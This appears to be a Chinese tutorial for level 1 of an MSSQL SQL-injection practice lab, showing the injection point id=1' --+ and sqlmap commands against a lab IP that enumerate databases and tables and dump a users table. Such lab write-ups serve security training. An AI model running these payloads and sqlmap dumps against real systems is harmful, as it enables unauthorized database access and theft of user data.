MSSQL 工具注入(第一关)

简介

SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程:

一、打开靶场选择第一关

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、查找是否存在 sql 漏洞

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ,在kali在输入语句,确定存在 sql 漏洞

四、查找库名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch

五、查找表名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch

六、得到表中的数据

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch

安全

网络安全靠人民,网络安全为人民

相关推荐
dark_200117 分钟前
ESXI8.0 vsphere vcenter 多网卡多网段配置
运维·服务器·网络
架构文摘JGWZ18 分钟前
这款神器,运维绝杀 !!! 【送源码】
运维·安全·web安全
奋斗的小青年I20 分钟前
一文秒懂ipconfig、ifconfig和ip addr的区别与应用
服务器·网络·windows·网络协议·tcp/ip·系统架构·云计算
老汉忒cpp2 小时前
TCP全连接队列和tcpdump抓包
网络·tcp/ip·tcpdump
小黑爱编程2 小时前
【Linux网络】Socket套接字
linux·运维·网络
KookeeyLena72 小时前
udp协议除了打游戏还有什么用途
网络·网络协议·udp
江喜原2 小时前
Seata
数据库·分布式·mysql·seata
lzb_kkk3 小时前
【Redis】redis5种数据类型(list)
开发语言·数据库·redis
bigbit_LiLi4 小时前
新能源汽车安全问题如何解决?细看“保护罩”连接器的守护使命
安全·汽车
MXsoft6185 小时前
数据中心服务器与存储运维的深度实践与挑战
数据库